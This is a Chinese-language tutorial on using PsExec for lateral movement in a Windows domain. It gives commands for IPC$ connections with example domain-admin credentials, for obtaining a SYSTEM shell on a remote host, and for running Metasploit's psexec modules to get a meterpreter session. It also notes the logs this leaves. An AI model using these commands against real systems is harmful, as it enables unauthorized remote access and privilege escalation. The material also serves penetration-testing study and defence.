横向移动 - PsExec 的使用

PsExec

PsExec 主要用于大批量 Windows 主机的维护，在域环境下效果尤其好。（因为 PsExec 是 Windows 提供的工具，所以杀毒软件将其列入白名单中）

因为使用 PsExec 通过命令行环境与目标机器建立连接，甚至控制目标机器，而不需要通过远程桌面（RDP）进行图形化的控制。

PsExec 包含在 PsTools 工具包中，下载地址：https://download.sysinternals.com/files/PSTools.zip

通过 PsExec 可以在远程目标主机上执行命令，也可以将管理员权限提升到 System 权限以运行指定的程序。

PsExec 的基本原理是：通过管道在远程目标主机上创建一个 psexec 服务，并在本地磁盘中生成一个名为”PSEXESVC“的二进制文件，然后通过 psexec 服务运行命令，运行结束后删除服务。

PsExec的使用

PsExec的使用

首先，需要获取目标操作系统的交互式 Shell。在建立了 ipc$ 的情况下：

net use \\192.168.3.21 /u:god\administrator Admin12345

执行如下命令，获取 System 权限的 Shell：

PsExec.exe -accepteula \\192.168.3.21 -s cmd.exe

# -accepteula  第一次运行 PsExec 会弹出确认框，使用该参数就不会弹出确认框
# -s      以System权限运行远程进程，获得一个System权限的交互式Shell，如果不用这个参数，那么会获得一个administrator权限的shell

获得一个 administrator 权限的 shell：

PsExec.exe -accepteula \\192.168.3.21 cmd.exe

如果没有建立 ipc$，PsExec 有两个参数可以通过指定的账号和密码进行远程连接：

PsExec.exe \\192.168.3.21 -u god\administrator -p Admin12345 cmd.exe

# -u  域\用户名
# -p  密码

使用 PsExec 在远程计算机上执行命令进行回显：

PsExec.exe \\192.168.3.21 -u god\administrator -p Admin12345 cmd /c "ipconfig"

PsExec的注意事项

需要远程系统开启admin共享（默认是开启的），原理是基于IPC共享，目标需要开放445端口和admin

在使用IPC连接目标系统后，不需要输入账户和密码。

在使用PsExec执行远程命令时，会在目标系统中创建一个psexec的服务。命令执行完后，psexec服务将被自动删除。由于创建或删除服务时会产生大量的日志，可以在攻击溯源时通过日志反推攻击流程。

使用PsExec可以直接获得System权限的交互式Shell（前提目标是administrator权限的shell）

在域环境测试时发现，非域用户无法利用内存中的票据使用PsExec功能，只能依靠账号和密码进行传递。

Metasploit 使用 PsExec 模块

查找有关 psexec 的模块：

search psexec

有两个常用的模块：

exploit/windows/smb/psexec
exploit/windows/smb/psexec_psh（Powershell 版本的 psexec）

使用模块：

use exploit/windows/smb/psexec
set rhosts 192.168.2.25
set smbuser administrator
set smbpass Admin12345

运行 exploit ，运行脚本会获得一个 meterpreter：

输入 shell，会获得一个 system 权限的 shell：

psexec_psh 模块和 psexec 模块的使用方法相同，二者的区别在于，通过 psexec_psh 模块上传的 payload 是 powershell 版本的。

参考文章：

https://zhuanlan.zhihu.com/p/228742108